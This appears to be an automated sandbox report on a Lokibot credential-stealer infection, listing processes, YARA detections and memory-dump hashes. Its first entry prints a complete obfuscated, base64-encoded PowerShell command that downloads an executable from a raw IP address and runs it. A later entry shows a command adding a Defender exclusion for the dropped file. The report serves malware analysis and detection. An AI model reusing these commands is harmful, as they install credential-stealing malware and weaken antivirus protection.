                                                                                                                              Commandline:"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:04:56:58
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:04:56:59
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:04:57:02
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline"
                                                                                                                              Imagebase:0xb00000
                                                                                                                              File size:2'141'552 bytes
                                                                                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:5
                                                                                                                              Start time:04:57:03
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF21.tmp" "c:\Users\user\AppData\Local\Temp\sg2bcrbf\CSC9DC7DEFBB3DB4CF88431EEB79FD9B6EB.TMP"
                                                                                                                              Imagebase:0x860000
                                                                                                                              File size:46'832 bytes
                                                                                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:04:57:08
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\wininit.exe"
                                                                                                                              Imagebase:0x220000
                                                                                                                              File size:600'576 bytes
                                                                                                                              MD5 hash:66B03D1AFF27D81E62B53FC108806211
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1797561748.0000000003569000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:04:57:08
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                              File size:55'320 bytes
                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:8
                                                                                                                              Start time:04:57:10
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:9
                                                                                                                              Start time:04:57:10
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\wininit.exe"
                                                                                                                              Imagebase:0x4d0000
                                                                                                                              File size:600'576 bytes
                                                                                                                              MD5 hash:66B03D1AFF27D81E62B53FC108806211
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.2881596868.0000000000948000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                              • Rule: Loki_1, Description: Loki Payload, Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                              Has exited:false

                                                                                                                              Target ID:10
                                                                                                                              Start time:04:57:10
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:11
                                                                                                                              Start time:04:57:12
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                                              File size:496'640 bytes
                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:14
                                                                                                                              Start time:04:57:21
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Reset < >
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1812293650.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_4bb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a591dbafdef4f917f1bfd7465e7050937a87b4db892cf733a89d1f64a4aefba2
                                                                                                                                • Instruction ID: ba8ea40d04eecfd47cce6a81ef89547051ed791925ba4d4575149f7f9e0a2b79
                                                                                                                                • Opcode Fuzzy Hash: a591dbafdef4f917f1bfd7465e7050937a87b4db892cf733a89d1f64a4aefba2
                                                                                                                                • Instruction Fuzzy Hash: 20222C74A00219AFCB15CF98D984AEEBBB2FF88310F248559E844AB365D771ED41CF90
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1828133255.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7a50000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: tPiq$tPiq
                                                                                                                                • API String ID: 0-4021134104
                                                                                                                                • Opcode ID: 547771a89fd864f5c3beb9d0671d81854ad979b27ba2b0a2a4df3a8a1d1b7284
                                                                                                                                • Instruction ID: d23a9a3e19f38324400a9118e3cb5a218f8bd8e7c81921437c9ebd3d169f018e
                                                                                                                                • Opcode Fuzzy Hash: 547771a89fd864f5c3beb9d0671d81854ad979b27ba2b0a2a4df3a8a1d1b7284
                                                                                                                                • Instruction Fuzzy Hash: C8F1D2B4B40209AFCB159F58D840B7EBBA2FBC9310F248569ED169B790DB31DC46CB91
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1828133255.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7a50000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: tPiq$tPiq
                                                                                                                                • API String ID: 0-4021134104
                                                                                                                                • Opcode ID: 78da12577682e0544d95613f08f9d4b45848e1a29ea872250e8f14c64be58835
                                                                                                                                • Instruction ID: a98e6eb6f428ded966fa4a1a5d52966bf8fee2351b9896a59b02d7d582b3f4fd
                                                                                                                                • Opcode Fuzzy Hash: 78da12577682e0544d95613f08f9d4b45848e1a29ea872250e8f14c64be58835
                                                                                                                                • Instruction Fuzzy Hash: 185136B0B00315AFCB209B798810B6BBBA6EFCA710F15C46AE955DF381DA71DC45C7A1
                                                                                                                                APIs
                                                                                                                                • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04BB51A9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1812293650.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_4bb0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DownloadFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1407266417-0
                                                                                                                                • Opcode ID: 1007af5ba103c9cc6003c662436d442b33f394b62db1bfe8fa1e6882dff0f180
                                                                                                                                • Instruction ID: ee52af1ac9134f56bb3a1b60dc7266b59dd21e9411618ed53b2895acea40f3e6
                                                                                                                                • Opcode Fuzzy Hash: 1007af5ba103c9cc6003c662436d442b33f394b62db1bfe8fa1e6882dff0f180
                                                                                                                                • Instruction Fuzzy Hash: 822104B1D01659EFCB10CF99D884AEEFBB4FB48314F10816AE958A7310D374A954CBA5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1828133255.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7a50000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: tPiq
                                                                                                                                • API String ID: 0-983062307
                                                                                                                                • Opcode ID: 2340d326f5a7d988f65176deddc8f46de1a848a5b8b97a86c769a6f0d309de7c
                                                                                                                                • Instruction ID: e2d97bd4e5689f9e07b6347919d6bfd8ec181c1bbe96c841b8ac050467d2a53c
                                                                                                                                • Opcode Fuzzy Hash: 2340d326f5a7d988f65176deddc8f46de1a848a5b8b97a86c769a6f0d309de7c
                                                                                                                                • Instruction Fuzzy Hash: CC9182F4B00209DBCB24CF58D540B7ABBB2BB85710F158569ED269B790DB31EC86CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1828133255.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7a50000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f98fe8160aa769ef6c032514f00f87628e39cffc6ddcfe533034b00645ddd5e3
                                                                                                                                • Instruction ID: bc498153a8bb02f48ddc38dbb99f352767af3fd7ad0faba5574ada949e1c4582
                                                                                                                                • Opcode Fuzzy Hash: f98fe8160aa769ef6c032514f00f87628e39cffc6ddcfe533034b00645ddd5e3
                                                                                                                                • Instruction Fuzzy Hash: 8C01F5B47003156BD720577A4801B6B7A96AFE5720F64C029F984DB7C0EAB69C448391
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1810434957.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_33ed000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1f75660fc95cc5922bdc2e8ddee54856c069e6c73e39d68847fbb3960193af50
                                                                                                                                • Instruction ID: e9a68e5e0f7cd9d26306e45372d161deab3c7d4b117ae7ce5297dcc17d7df834
                                                                                                                                • Opcode Fuzzy Hash: 1f75660fc95cc5922bdc2e8ddee54856c069e6c73e39d68847fbb3960193af50
                                                                                                                                • Instruction Fuzzy Hash: C601F2710083149EE710CA29CDC4B67FF9CEF41326F0CC56AEC484A686C27D9C41C6B1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1810434957.00000000033ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 033ED000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_33ed000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 59fb6b4a0b2f661140695a83c6f8bd855a4fe4edfc05ec9ff935ff56ae295cbe
                                                                                                                                • Instruction ID: 09eca085fbcf983a9d4898b29e50a2a02a573175d24fe356cb195914eb8a3734
                                                                                                                                • Opcode Fuzzy Hash: 59fb6b4a0b2f661140695a83c6f8bd855a4fe4edfc05ec9ff935ff56ae295cbe
                                                                                                                                • Instruction Fuzzy Hash: 1C01407100E3C09ED7128B25CC94B52BFB4EF47225F1D81CBD8888F1A3C2699844C772
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1828133255.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7a50000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'iq$4'iq$X=\l$$iq$$iq
                                                                                                                                • API String ID: 0-3684127496
                                                                                                                                • Opcode ID: 0c4734d65fc8825ca25bb850f17e877e3442169ff2f4a9293ad0c3294a27d094
                                                                                                                                • Instruction ID: 13d07b01099c0cd86c2fd5db1d6ba36043c02ae0215eda85f2a3b8888871a4af
                                                                                                                                • Opcode Fuzzy Hash: 0c4734d65fc8825ca25bb850f17e877e3442169ff2f4a9293ad0c3294a27d094
                                                                                                                                • Instruction Fuzzy Hash: 625117B270530A8FCB259B78D4103ABBBF2AFC2310F15846AC8A5CB395DB35D885C791
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1828133255.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7a50000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'iq$4'iq$$iq$$iq
                                                                                                                                • API String ID: 0-425347740
                                                                                                                                • Opcode ID: 482f98fd833786142558f1c9e2977dbd8915329abd0e3dc7e829df8b4e33a961
                                                                                                                                • Instruction ID: 8ce52ea9d29a3fde9161f605be3e99564ea00c18f643105b0bb6003d0c62222c
                                                                                                                                • Opcode Fuzzy Hash: 482f98fd833786142558f1c9e2977dbd8915329abd0e3dc7e829df8b4e33a961
                                                                                                                                • Instruction Fuzzy Hash: 7701BC612493964FC7270378282016B6F766FD361032B41EBC890DF3E3DA694D4A83A6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1705441668.0000000007D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d60000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'iq$4'iq$4'iq$4'iq
                                                                                                                                • API String ID: 0-3501548979
                                                                                                                                • Opcode ID: 850e4f88725199613bdd4bf07c29d14c21d6398c20fa2fd781ffffb231c57324
                                                                                                                                • Instruction ID: 4b1e5597a807106a898b030e79e5c57aab95f7f8301e48fe277464af019b29d0
                                                                                                                                • Opcode Fuzzy Hash: 850e4f88725199613bdd4bf07c29d14c21d6398c20fa2fd781ffffb231c57324
                                                                                                                                • Instruction Fuzzy Hash: B41259B1B043498FCB229B68981477BFBA2AFD6311F1480BAD545CF392DB32D945C7A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1701566645.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e50000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e589b8f1d6ba7caed6907c8c1500b414af3d89a1418eba72c723cca3feac6cb0
                                                                                                                                • Instruction ID: e0751a17e8c196e2833ef34bfcf20a7217b81d3402989faa76c1e3c13d8623f2
                                                                                                                                • Opcode Fuzzy Hash: e589b8f1d6ba7caed6907c8c1500b414af3d89a1418eba72c723cca3feac6cb0
                                                                                                                                • Instruction Fuzzy Hash: 3A916AB4A002098FCB15CF58C4D49AEBBB1FF48314B2486A9DA55AB3A6D735FC41CF94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1705441668.0000000007D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d60000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a240e58923d57f3a208a1f4f892b2f32e5181fd583f4182c604897d7c6f1a5b4
                                                                                                                                • Instruction ID: 7c04afb7b7c47791ebd9d5541924735be8aa5201d08b378c645a5078d6c9bd27
                                                                                                                                • Opcode Fuzzy Hash: a240e58923d57f3a208a1f4f892b2f32e5181fd583f4182c604897d7c6f1a5b4
                                                                                                                                • Instruction Fuzzy Hash: 8A41DAF1A043499FCF268F298445A6EFBB2AF91314B1980B5DA04DF255D733CD48CBA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1701566645.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e50000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a59ef5e1962682d4e00d74f591b84dffab21a5258e4efe19942cc3d42199c1a8
                                                                                                                                • Instruction ID: 0856e7dd09821a0f8afa2c7730ee740350a37a38892d2b6dd228010fe9c081d4
                                                                                                                                • Opcode Fuzzy Hash: a59ef5e1962682d4e00d74f591b84dffab21a5258e4efe19942cc3d42199c1a8
                                                                                                                                • Instruction Fuzzy Hash: BC4168B4A006098FCB05CF58C198AAEFBB1FF48314B158699D915AB365C736FC51CFA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.1701566645.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_4e50000_powershell.jbxd
                                                                                                                                Similarity
